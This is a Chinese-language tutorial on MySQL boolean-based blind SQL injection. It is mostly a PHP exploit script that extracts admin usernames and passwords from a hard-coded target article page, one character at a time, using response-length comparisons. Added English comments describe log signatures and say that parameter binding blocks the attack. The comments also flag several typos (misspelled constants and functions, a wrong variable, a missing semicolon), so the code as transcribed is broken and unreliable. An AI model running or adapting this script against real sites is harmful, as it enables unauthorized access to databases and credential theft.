盲注入原理
mysql的盲注入语句
得到表里的帐号和密码长度
select * from article where id=1 and LENGTH
(select GROUP_CONCAT(username,0x3a,password)from admin))=38
返回正常页面:
得到长度后,再逐位判断每个字符的 ASCII 码
select * from article where id=1 and ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin,1,1))=97
注:admin 的首字母 a 的 ASCII 码为 97
页面正常显示
编写exp
原理:先得到数据长度,再逐位遍历每个字符的 ASCII 码,最后把 ASCII 码转回字符。
为什么不直接用字符?
因为所用的 PHP 版本开启了 GPC(magic_quotes_gpc)后,其中的单引号会被转义。
拿页面cookie值
<?php
// Issue one HTTP request with the cURL extension.
//   $url          URL to request
//   $post         array of POST fields; empty/falsy means a plain GET
//   $cookie       raw Cookie header value; empty means none is sent
//   $returnCookie when truthy, response headers are kept (CURLOPT_HEADER)
//                 and an array with 'cookie' and 'content' keys is returned
// Intended to return the response body (or the array above). On a curl
// failure the curl_error() text is returned instead of the body, so callers
// that only compare strlen() cannot tell an error message from a page.
// NOTE(review): as transcribed, several identifiers in this function do not
// resolve in PHP (the listing is a write-up, not a verified run); the comments
// below describe the intended flow.
function curl_request($url,$post='',$cookie='',$returnCookie=0){
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$url);
// Constant desktop-browser User-Agent and a fixed placeholder Referer: both
// are stable request attributes that stand out in server access logs.
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0(compatible;MSIE 10.0;windows NT 6.1;Trident/6.0)');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_AUTOREFERER,1);
curl_setopt($curl,CURLOPT_REFERER,"http://xxx");
// POST branch: fields are form-encoded. The one caller in this listing
// (exploit()) passes '' for $post, so this branch is not exercised here.
if($post){
curl_setopt($curl,CUROPT_POST,1);
curl_setopt($curl,CUROPT_POSTFIELDS,http_build_query($post));
}
if($cookie){
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
}
// CURLOPT_HEADER is tied to $returnCookie, so headers are only present in
// $data when the caller asked for the cookie back.
curl_setopt($curl,CURLOPT_HEADER,$returnCookie);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($cur1);
// Error path returns the message string and skips curl_close() (handle leak).
if(curl_errno($curl)){
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
// Split headers from body on the first blank line, then take the first
// Set-Cookie value up to ';'; substr(...,1) presumably drops the leading
// space after the colon.
list($header,$body)=explode("\r\n\r\n",$data,2);
preg_math_all("/Set\-Cookie:([^;]*);/",$header,$matches);
$info['cookie']=substr($matches[1][0],1);
$info['content']=$body;
return $info;
}else{
return $data;
}
}
// Determine the length of the target string through a boolean oracle.
// One request per candidate length N, counting up from 1 and appending
// "and LENGTH((...))=N" to the URL; the first N whose response body has the
// same byte length as the baseline page $html is taken as the answer.
//   $url    base URL that already carries the injectable id parameter
//   $cookie session cookie forwarded on every probe
//   $html   baseline response body (unmodified page) used as the "true" reference
// Returns the matched length as an int ('' is only the initial value).
// The loop has no upper bound: if no probe response ever matches the
// baseline length (for instance when page content varies between requests),
// it never terminates.
function getstrlen($url,$cookie,$html){
$data_len='';
$i=1;
while(true){
// URL-encoded probe. Each probe is a separate GET whose id parameter ends in
// "and LENGTH(...)=<N>"; a run of near-identical requests differing only in
// the trailing number is the signature a log or WAF rule should key on.
$s="%20and%20LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i}";
$urlexp=$url.$s;
// Oracle: response length equality with the baseline, not response content.
if(strlen($html)==strlen(exploit($urlexp,$cookie))){
$data_len=$i;
break;
}
$i++;
}
return $data_len;
}
// Fetch $url with the given cookie as a plain GET and return whatever
// curl_request() produced (the body, or its error-string case).
function exploit($url,$cookie){
$html=curl_request($url,'',$cookie);
return $html
}
// Recover the target string byte by byte using the same length oracle.
// For each position $i (1-based, up to $datalen) candidate codes 1..125 are
// tried in ascending order; the first $j whose probe response has the same
// length as $tmp_html is accepted as chr($j) and appended. The running
// result is echoed after every accepted byte.
//   $url      base URL carrying the injectable id parameter
//   $cookie   session cookie forwarded on every probe
//   $datalen  number of positions to probe (from getstrlen())
//   $tmp_html baseline response body used as the "true" reference
// Returns the accumulated string. Two consequences of the loops as written:
// a position with no match in 1..125 is skipped (nothing appended), so the
// result can be shorter than $datalen; and byte values 126..255 are never
// probed, so '~', DEL and bytes of multi-byte text are not recovered.
// Every probe is a purely numeric comparison, which is the reason the
// write-up gives for avoiding quoted characters under magic_quotes_gpc; it
// is also why quote escaping alone does not mitigate this class of
// injection — binding the id parameter (or casting it to an integer on the
// server side) removes the oracle.
function get_data($url,$cookie,$datalen,$tmp_html){
$admin_pass='';
for($i=1;$i<=$datalen;$i++){
for($j=1;$j<=125;$j++){
// Up to 125 requests per position (at most 125 * $datalen in total), each a
// separate GET; that request volume is what makes this phase visible in
// access logs.
$s="%20and%20ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j}";
if(strlen($tmp_html)==strlen(exploit($url.$s,$cookie))){
$c=chr($j);
$admin_pass.=$c;
echo $admin_pass."\r\n";
break;
}
}
}
return $admin_pass;
}
// Run configuration: a hard-coded session cookie and target URL (values as
// given in the write-up). The cookie is forwarded on every probe.
$cookie='PHPSESSID=bn43dma24ghqeuosagkqj9ib45';
$url='http://www.moontestester.com/article.php?id=1';
// Baseline: the unmodified page, fetched once; every probe is compared
// against this body's length.
$tmp_html=exploit($url,$cookie);
$datalen=getstrlen($url,$cookie,$tmp_html);
// getstrlen() only returns after a match with $i >= 1, so the else branch
// is unreachable as the loop is written.
if($datalen)
{
// get_data() already echoes its running result; this prints the final
// string once more.
echo get_data($url,$cookie,$datalen,$tmp_html);
}else{
echo "data null";
}
?>
在终端运行如图所示:
最后结果: